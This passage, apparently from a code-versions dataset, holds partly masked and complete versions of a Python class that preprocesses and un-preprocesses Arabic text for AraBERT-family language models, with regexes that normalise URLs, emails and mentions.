\\\\]|\\\\[ رابط\\\\]|\\\\[رابط \\\\]',\n ' [رابط] ', text)\n text = re.sub('\\\\[ بريد \\\\]|\\\\[ بريد\\\\]|\\\\[بريد \\\\]',\n ' [بريد] ', text)\n text = re.sub('\\\\[ مستخدم \\\\]|\\\\[ مستخدم\\\\]|\\\\[مستخدم \\\\]',\n ' [مستخدم] ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-٩ٱ-ٳa-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n if do_farasa_tokenization:\n text = self._tokenize_arabic_words_farasa(text)\n return text.strip()\n\n def _farasa_segment(self, text):\n line_farasa = text.split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n if '+' not in word:\n segmented_line.append(word)\n continue\n segmented_word = self._split_farasa_output(word)\n segmented_line.extend(segmented_word)\n 
return ' '.join(segmented_line)\n\n def _split_farasa_output(self, word):\n segmented_word = []\n temp_token = ''\n for i, c in enumerate(word):\n if c == '+':\n if temp_token == 'ك':\n if i == 1:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif word[i - 2] == '+':\n if segmented_word[-1][-1] == '+':\n segmented_word.append(temp_token + '+')\n temp_token = ''\n else:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n elif temp_token in prefix_list:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n else:\n segmented_word.append(temp_token)\n temp_token = ''\n continue\n temp_token += c\n if temp_token != '':\n if temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n else:\n segmented_word.append(temp_token)\n return segmented_word\n\n def _tokenize_arabic_words_farasa(self, line_input):\n if self.keep_emojis:\n line_farasa = []\n for word in line_input.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n line_farasa.append(word)\n else:\n line_farasa.append(self.farasa_segmenter.segment(word))\n else:\n line_farasa = self.farasa_segmenter.segment(line_input).split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n segmented_word = []\n for token in word.split('+'):\n if token in prefix_list:\n segmented_word.append(token + '+')\n elif token in suffix_list:\n segmented_word.append('+' + token)\n else:\n segmented_word.append(token)\n segmented_line.extend(segmented_word)\n return ' '.join(segmented_line)\n\n def _remove_elongation(self, text):\n \"\"\"\n :param text: the input text to remove elongation\n :return: delongated text\n \"\"\"\n for index_ in range(len(re.findall(regex_tatweel, text))):\n elongation = re.search(regex_tatweel, text)\n if elongation:\n elongation_pattern = elongation.group()\n elongation_replacement = elongation_pattern[0]\n elongation_pattern = re.escape(elongation_pattern)\n text = re.sub(elongation_pattern, elongation_replacement,\n text, flags=re.MULTILINE)\n else:\n break\n return text\n\n def _remove_redundant_punct(self, text):\n text_ = text\n result = re.search(redundant_punct_pattern, text)\n dif = 0\n while result:\n sub = result.group()\n sub = sorted(set(sub), key=sub.index)\n sub = ' ' + ''.join(list(sub)) + ' '\n text = ''.join((text[:result.span()[0] + dif], sub, text[result\n .span()[1] + dif:]))\n text_ = ''.join((text_[:result.span()[0]], text_[result.span()[\n 1]:])).strip()\n dif = abs(len(text) - len(text_))\n result = re.search(redundant_punct_pattern, text_)\n text = re.sub('\\\\s+', ' ', text)\n return text.strip()\n\n\n<mask token>\n",
"step-3": "<mask token>\nACCEPTED_MODELS = ['bert-base-arabertv01', 'bert-base-arabert',\n 'bert-base-arabertv02', 'bert-base-arabertv2', 'bert-large-arabertv02',\n 'bert-large-arabertv2', 'araelectra-base',\n 'araelectra-base-discriminator', 'araelectra-base-generator',\n 'aragpt2-base', 'aragpt2-medium', 'aragpt2-large', 'aragpt2-mega']\nSEGMENTED_MODELS = ['bert-base-arabert', 'bert-base-arabertv2',\n 'bert-large-arabertv2']\n\n\nclass ArbertmoPreprocessor:\n \"\"\"\n A Preprocessor class that cleans and preprocesses text for all models in the AraBERT repo.\n It also can unprocess the text ouput of the generated text\n\n Args:\n\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n\n Returns:\n\n ArBERTMoPreprocessor: the preprocessor class\n\n Example:\n\n from preprocess import ArBERTMoPreprocessor\n\n arabert_prep = ArBERTMoPreprocessor(\"aubmindlab/bert-base-arabertv2\")\n\n arabert_prep.preprocess(\"SOME ARABIC TEXT\")\n \"\"\"\n\n def __init__(self, model_name, keep_emojis=False, remove_html_markup=\n True, replace_urls_emails_mentions=True, strip_tashkeel=True,\n strip_tatweel=True, insert_white_spaces=True, remove_elongation=True):\n \"\"\"\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". 
Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n \"\"\"\n model_name = model_name.replace('aubmindlab/', '')\n if model_name not in ACCEPTED_MODELS:\n logging.warning(\n \"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation\"\n )\n self.model_name = 'bert-base-arabertv02'\n else:\n self.model_name = model_name\n if self.model_name in SEGMENTED_MODELS:\n logging.info(\n 'Selected Model requires pre-segmentation, Initializing FarasaSegmenter'\n )\n try:\n from farasa.segmenter import FarasaSegmenter\n self.farasa_segmenter = FarasaSegmenter(interactive=True)\n except:\n logging.warning(\n 'farasapy is not installed, you want be able to process text for AraBERTv1 and v2. 
Install it using: pip install farasapy'\n )\n else:\n logging.info(\n \"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization\"\n )\n self.keep_emojis = keep_emojis\n if self.keep_emojis:\n import emoji\n self.emoji = emoji\n if self.model_name in SEGMENTED_MODELS:\n logging.warning(\n 'Keeping tweets with Farasa Segmentation is 10 times slower'\n )\n self.remove_html_markup = remove_html_markup\n self.replace_urls_emails_mentions = replace_urls_emails_mentions\n self.strip_tashkeel = strip_tashkeel\n self.strip_tatweel = strip_tatweel\n self.insert_white_spaces = insert_white_spaces\n self.remove_elongation = remove_elongation\n\n def preprocess(self, text):\n \"\"\"\n Preprocess takes an input text line an applies the same preprocessing used in AraBERT\n pretraining\n\n Args:\n\n text (:obj:`str`): inout text string\n\n Returns:\n\n string: A preprocessed string depending on which model was selected\n \"\"\"\n if self.model_name == 'bert-base-arabert':\n return self._old_preprocess(text, do_farasa_tokenization=True)\n if self.model_name == 'bert-base-arabertv01':\n return self._old_preprocess(text, do_farasa_tokenization=False)\n text = str(text)\n text = html.unescape(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n if self.strip_tatweel:\n text = araby.strip_tatweel(text)\n if self.replace_urls_emails_mentions:\n for reg in url_regexes:\n text = re.sub(reg, ' [رابط] ', text)\n for reg in email_regexes:\n text = re.sub(reg, ' [بريد] ', text)\n text = re.sub(user_mention_regex, ' [مستخدم] ', text)\n if self.remove_html_markup:\n text = re.sub('<br />', ' ', text)\n text = re.sub('</?[^>]+>', ' ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-ي٠-٩a-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n text = re.sub('(\\\\d+)([ء-غف-ي٠-٬]+)', ' \\\\1 \\\\2 ', text)\n text = re.sub('([ء-غف-ي٠-٬]+)(\\\\d+)', ' \\\\1 \\\\2 ', text)\n if self.keep_emojis:\n emoji_regex = ''.join(list(self.emoji.UNICODE_EMOJI['en'].keys()))\n rejected_chars_regex2 = '[^%s%s]' % (chars_regex, emoji_regex)\n text = re.sub(rejected_chars_regex2, ' ', text)\n else:\n text = re.sub(rejected_chars_regex, ' ', text)\n text = ' '.join(text.replace('️', '').split())\n if (self.model_name == 'bert-base-arabertv2' or self.model_name ==\n 'bert-large-arabertv2'):\n if self.keep_emojis:\n new_text = []\n for word in text.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n new_text.append(word)\n else:\n new_text.append(self.farasa_segmenter.segment(word))\n text = ' '.join(new_text)\n else:\n text = self.farasa_segmenter.segment(text)\n return self._farasa_segment(text)\n return text\n\n def unpreprocess(self, text, desegment=True):\n \"\"\"Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.\n The objective is to make the generated text of any model appear natural and not preprocessed.\n\n Args:\n text (str): input text to be un-preprocessed\n desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. 
Defaults to True.\n\n Returns:\n str: The unpreprocessed (and possibly Farasa-desegmented) text.\n \"\"\"\n if self.model_name in SEGMENTED_MODELS and desegment:\n text = self.desegment(text)\n text = re.sub(white_spaced_double_quotation_regex, '\"' + '\\\\1' +\n '\"', text)\n text = re.sub(white_spaced_single_quotation_regex, \"'\" + '\\\\1' +\n \"'\", text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\`' + '\\\\1' +\n '\\\\`', text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\—' + '\\\\1' +\n '\\\\—', text)\n text = text.replace('.', ' . ')\n text = ' '.join(text.split())\n text = re.sub('(\\\\d+) \\\\. (\\\\d+)', '\\\\1.\\\\2', text)\n text = re.sub('(\\\\d+) \\\\, (\\\\d+)', '\\\\1,\\\\2', text)\n text = re.sub(left_and_right_spaced_chars, '\\\\1', text)\n text = re.sub(left_spaced_chars, '\\\\1', text)\n text = re.sub(right_spaced_chars, '\\\\1', text)\n return text\n\n def desegment(self, text):\n \"\"\"\n Use this function if sentence tokenization was done using\n `from arabert.preprocess_arabert import preprocess` with Farasa enabled\n AraBERT segmentation using Farasa adds a space after the '+' for prefixes,\n and after before the '+' for suffixes\n\n Example:\n >>> desegment('ال+ دراس +ات')\n الدراسات\n \"\"\"\n text = text.replace('+ ', '+')\n text = text.replace(' +', '+')\n text = ' '.join([self._desegmentword(word) for word in text.split(' ')]\n )\n return text\n\n def _desegmentword(self, orig_word: str) ->str:\n \"\"\"\n Word segmentor that takes a Farasa Segmented Word and removes the '+' signs\n\n Example:\n >>> _desegmentword(\"ال+يومي+ة\")\n اليومية\n \"\"\"\n word = orig_word.replace('ل+ال+', 'لل')\n if 'ال+ال' not in orig_word:\n word = word.replace('ل+ال', 'لل')\n word = word.replace('+', '')\n word = word.replace('للل', 'لل')\n return word\n\n def _old_preprocess(self, text, do_farasa_tokenization):\n \"\"\"\n AraBERTv1 preprocessing Function\n \"\"\"\n text = str(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n text = re.sub('\\\\d+\\\\/[ء-ي]+\\\\/\\\\d+\\\\]', '', text)\n text = re.sub('ـ', '', text)\n text = re.sub('[«»]', ' \" ', text)\n if self.replace_urls_emails_mentions:\n text = re.sub(regex_url_step1, '[رابط]', text)\n text = re.sub(regex_url_step2, '[رابط]', text)\n text = re.sub(regex_url, '[رابط]', text)\n text = re.sub(regex_email, '[بريد]', text)\n text = re.sub(regex_mention, '[مستخدم]', text)\n text = re.sub('…', '\\\\.', text).strip()\n text = self._remove_redundant_punct(text)\n if self.replace_urls_emails_mentions:\n text = re.sub('\\\\[ رابط \\\\]|\\\\[ رابط\\\\]|\\\\[رابط \\\\]',\n ' [رابط] ', text)\n text = re.sub('\\\\[ بريد \\\\]|\\\\[ بريد\\\\]|\\\\[بريد \\\\]',\n ' [بريد] ', text)\n text = re.sub('\\\\[ مستخدم \\\\]|\\\\[ مستخدم\\\\]|\\\\[مستخدم \\\\]',\n ' [مستخدم] ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-٩ٱ-ٳa-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n if do_farasa_tokenization:\n text = self._tokenize_arabic_words_farasa(text)\n return text.strip()\n\n def _farasa_segment(self, text):\n line_farasa = text.split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n if '+' not in word:\n segmented_line.append(word)\n continue\n segmented_word = self._split_farasa_output(word)\n segmented_line.extend(segmented_word)\n 
return ' '.join(segmented_line)\n\n def _split_farasa_output(self, word):\n segmented_word = []\n temp_token = ''\n for i, c in enumerate(word):\n if c == '+':\n if temp_token == 'ك':\n if i == 1:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif word[i - 2] == '+':\n if segmented_word[-1][-1] == '+':\n segmented_word.append(temp_token + '+')\n temp_token = ''\n else:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n elif temp_token in prefix_list:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n else:\n segmented_word.append(temp_token)\n temp_token = ''\n continue\n temp_token += c\n if temp_token != '':\n if temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n else:\n segmented_word.append(temp_token)\n return segmented_word\n\n def _tokenize_arabic_words_farasa(self, line_input):\n if self.keep_emojis:\n line_farasa = []\n for word in line_input.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n line_farasa.append(word)\n else:\n line_farasa.append(self.farasa_segmenter.segment(word))\n else:\n line_farasa = self.farasa_segmenter.segment(line_input).split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n segmented_word = []\n for token in word.split('+'):\n if token in prefix_list:\n segmented_word.append(token + '+')\n elif token in suffix_list:\n segmented_word.append('+' + token)\n else:\n segmented_word.append(token)\n segmented_line.extend(segmented_word)\n return ' '.join(segmented_line)\n\n def _remove_elongation(self, text):\n \"\"\"\n :param text: the input text to remove elongation\n :return: delongated text\n \"\"\"\n for index_ in range(len(re.findall(regex_tatweel, text))):\n elongation = re.search(regex_tatweel, text)\n if elongation:\n elongation_pattern = elongation.group()\n elongation_replacement = elongation_pattern[0]\n elongation_pattern = re.escape(elongation_pattern)\n text = re.sub(elongation_pattern, elongation_replacement,\n text, flags=re.MULTILINE)\n else:\n break\n return text\n\n def _remove_redundant_punct(self, text):\n text_ = text\n result = re.search(redundant_punct_pattern, text)\n dif = 0\n while result:\n sub = result.group()\n sub = sorted(set(sub), key=sub.index)\n sub = ' ' + ''.join(list(sub)) + ' '\n text = ''.join((text[:result.span()[0] + dif], sub, text[result\n .span()[1] + dif:]))\n text_ = ''.join((text_[:result.span()[0]], text_[result.span()[\n 1]:])).strip()\n dif = abs(len(text) - len(text_))\n result = re.search(redundant_punct_pattern, text_)\n text = re.sub('\\\\s+', ' ', text)\n return text.strip()\n\n\nprefix_list = ['ال', 'و', 'ف', 'ب', 'ك', 'ل', 'لل', 'ال', 'و', 'ف', 'ب',\n 'ك', 'ل', 'لل', 'س']\nsuffix_list = ['ه', 'ها', 'ك', 'ي', 'هما', 'كما', 'نا', 'كم', 'هم', 'هن',\n 'كن', 'ا', 'ان', 'ين', 'ون', 'وا', 'ات', 'ت', 'ن', 'ة', 'ه', 'ها', 'ك',\n 'ي', 'هما', 'كما', 'نا', 'كم', 'هم', 'هن', 'كن', 'ا', 'ان', 'ين', 'ون',\n 'وا', 'ات', 'ت', 'ن', 'ة']\nother_tokens = ['[رابط]', '[مستخدم]', '[بريد]']\nprefix_symbols = [(x + '+') for x in prefix_list]\nsuffix_symblos = [('+' + x) for x in suffix_list]\nnever_split_tokens = list(set(prefix_symbols + suffix_symblos + other_tokens))\nurl_regexes = [\n 
'(http(s)?:\\\\/\\\\/.)?(www\\\\.)?[-a-zA-Z0-9@:%._\\\\+~#=]{2,256}\\\\.[a-z]{2,6}\\\\b([-a-zA-Z0-9@:%_\\\\+.~#?&//=]*)'\n , '@(https?|ftp)://(-\\\\.)?([^\\\\s/?\\\\.#-]+\\\\.?)+(/[^\\\\s]*)?$@iS',\n 'http[s]?://[a-zA-Z0-9_\\\\-./~\\\\?=%&]+', 'www[a-zA-Z0-9_\\\\-?=%&/.~]+',\n '[a-zA-Z]+\\\\.com', '(?=http)[^\\\\s]+', '(?=www)[^\\\\s]+', '://']\nuser_mention_regex = '@[\\\\w\\\\d]+'\nemail_regexes = ['[\\\\w-]+@([\\\\w-]+\\\\.)+[\\\\w-]+', '\\\\S+@\\\\S+']\nredundant_punct_pattern = (\n '([!\\\\\"#\\\\$%\\\\\\'\\\\(\\\\)\\\\*\\\\+,\\\\.:;\\\\-<=·>?@\\\\[\\\\\\\\\\\\]\\\\^_ـ`{\\\\|}~—٪’،؟`୍“؛”ۚ【»؛\\\\s+«–…‘]{2,})'\n )\nregex_tatweel = '(\\\\D)\\\\1{2,}'\nrejected_chars_regex = (\n '[^0-9\\\\u0621-\\\\u063A\\\\u0640-\\\\u066C\\\\u0671-\\\\u0674a-zA-Z\\\\[\\\\]!\\\\\"#\\\\$%\\\\\\'\\\\(\\\\)\\\\*\\\\+,\\\\.:;\\\\-<=·>?@\\\\[\\\\\\\\\\\\]\\\\^_ـ`{\\\\|}~—٪’،؟`୍“؛”ۚ»؛\\\\s+«–…‘]'\n )\nregex_url_step1 = '(?=http)[^\\\\s]+'\nregex_url_step2 = '(?=www)[^\\\\s]+'\nregex_url = (\n '(http(s)?:\\\\/\\\\/.)?(www\\\\.)?[-a-zA-Z0-9@:%._\\\\+~#=]{2,256}\\\\.[a-z]{2,6}\\\\b([-a-zA-Z0-9@:%_\\\\+.~#?&//=]*)'\n )\nregex_mention = '@[\\\\w\\\\d]+'\nregex_email = '\\\\S+@\\\\S+'\nchars_regex = (\n '0-9\\\\u0621-\\\\u063A\\\\u0640-\\\\u066C\\\\u0671-\\\\u0674a-zA-Z\\\\[\\\\]!\\\\\"#\\\\$%\\\\\\'\\\\(\\\\)\\\\*\\\\+,\\\\.:;\\\\-<=·>?@\\\\[\\\\\\\\\\\\]\\\\^_ـ`{\\\\|}~—٪’،؟`୍“؛”ۚ»؛\\\\s+«–…‘'\n )\nwhite_spaced_double_quotation_regex = '\\\\\"\\\\s+([^\"]+)\\\\s+\\\\\"'\nwhite_spaced_single_quotation_regex = \"\\\\'\\\\s+([^']+)\\\\s+\\\\'\"\nwhite_spaced_back_quotation_regex = '\\\\`\\\\s+([^`]+)\\\\s+\\\\`'\nwhite_spaced_em_dash = '\\\\—\\\\s+([^—]+)\\\\s+\\\\—'\nleft_spaced_chars = ' ([\\\\]!#\\\\$%\\\\),\\\\.:;\\\\?}٪’،؟”؛…»·])'\nright_spaced_chars = '([\\\\[\\\\(\\\\{“«‘*\\\\~]) '\nleft_and_right_spaced_chars = ' ([\\\\+\\\\-\\\\<\\\\=\\\\>\\\\@\\\\\\\\\\\\^\\\\_\\\\|\\\\–]) '\n",
"step-4": "import html\nimport logging\nimport re\nimport pyarabic.araby as araby\nACCEPTED_MODELS = ['bert-base-arabertv01', 'bert-base-arabert',\n 'bert-base-arabertv02', 'bert-base-arabertv2', 'bert-large-arabertv02',\n 'bert-large-arabertv2', 'araelectra-base',\n 'araelectra-base-discriminator', 'araelectra-base-generator',\n 'aragpt2-base', 'aragpt2-medium', 'aragpt2-large', 'aragpt2-mega']\nSEGMENTED_MODELS = ['bert-base-arabert', 'bert-base-arabertv2',\n 'bert-large-arabertv2']\n\n\nclass ArbertmoPreprocessor:\n \"\"\"\n A Preprocessor class that cleans and preprocesses text for all models in the AraBERT repo.\n It also can unprocess the text ouput of the generated text\n\n Args:\n\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n\n Returns:\n\n ArBERTMoPreprocessor: the preprocessor class\n\n Example:\n\n from preprocess import ArBERTMoPreprocessor\n\n arabert_prep = ArBERTMoPreprocessor(\"aubmindlab/bert-base-arabertv2\")\n\n arabert_prep.preprocess(\"SOME ARABIC TEXT\")\n \"\"\"\n\n def __init__(self, model_name, keep_emojis=False, remove_html_markup=\n True, replace_urls_emails_mentions=True, strip_tashkeel=True,\n strip_tatweel=True, insert_white_spaces=True, remove_elongation=True):\n \"\"\"\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". 
Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n \"\"\"\n model_name = model_name.replace('aubmindlab/', '')\n if model_name not in ACCEPTED_MODELS:\n logging.warning(\n \"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation\"\n )\n self.model_name = 'bert-base-arabertv02'\n else:\n self.model_name = model_name\n if self.model_name in SEGMENTED_MODELS:\n logging.info(\n 'Selected Model requires pre-segmentation, Initializing FarasaSegmenter'\n )\n try:\n from farasa.segmenter import FarasaSegmenter\n self.farasa_segmenter = FarasaSegmenter(interactive=True)\n except:\n logging.warning(\n 'farasapy is not installed, you want be able to process text for AraBERTv1 and v2. 
Install it using: pip install farasapy'\n )\n else:\n logging.info(\n \"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization\"\n )\n self.keep_emojis = keep_emojis\n if self.keep_emojis:\n import emoji\n self.emoji = emoji\n if self.model_name in SEGMENTED_MODELS:\n logging.warning(\n 'Keeping tweets with Farasa Segmentation is 10 times slower'\n )\n self.remove_html_markup = remove_html_markup\n self.replace_urls_emails_mentions = replace_urls_emails_mentions\n self.strip_tashkeel = strip_tashkeel\n self.strip_tatweel = strip_tatweel\n self.insert_white_spaces = insert_white_spaces\n self.remove_elongation = remove_elongation\n\n def preprocess(self, text):\n \"\"\"\n Preprocess takes an input text line an applies the same preprocessing used in AraBERT\n pretraining\n\n Args:\n\n text (:obj:`str`): inout text string\n\n Returns:\n\n string: A preprocessed string depending on which model was selected\n \"\"\"\n if self.model_name == 'bert-base-arabert':\n return self._old_preprocess(text, do_farasa_tokenization=True)\n if self.model_name == 'bert-base-arabertv01':\n return self._old_preprocess(text, do_farasa_tokenization=False)\n text = str(text)\n text = html.unescape(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n if self.strip_tatweel:\n text = araby.strip_tatweel(text)\n if self.replace_urls_emails_mentions:\n for reg in url_regexes:\n text = re.sub(reg, ' [رابط] ', text)\n for reg in email_regexes:\n text = re.sub(reg, ' [بريد] ', text)\n text = re.sub(user_mention_regex, ' [مستخدم] ', text)\n if self.remove_html_markup:\n text = re.sub('<br />', ' ', text)\n text = re.sub('</?[^>]+>', ' ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-ي٠-٩a-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n text = re.sub('(\\\\d+)([ء-غف-ي٠-٬]+)', ' \\\\1 \\\\2 ', text)\n text = re.sub('([ء-غف-ي٠-٬]+)(\\\\d+)', ' \\\\1 \\\\2 ', text)\n if self.keep_emojis:\n emoji_regex = ''.join(list(self.emoji.UNICODE_EMOJI['en'].keys()))\n rejected_chars_regex2 = '[^%s%s]' % (chars_regex, emoji_regex)\n text = re.sub(rejected_chars_regex2, ' ', text)\n else:\n text = re.sub(rejected_chars_regex, ' ', 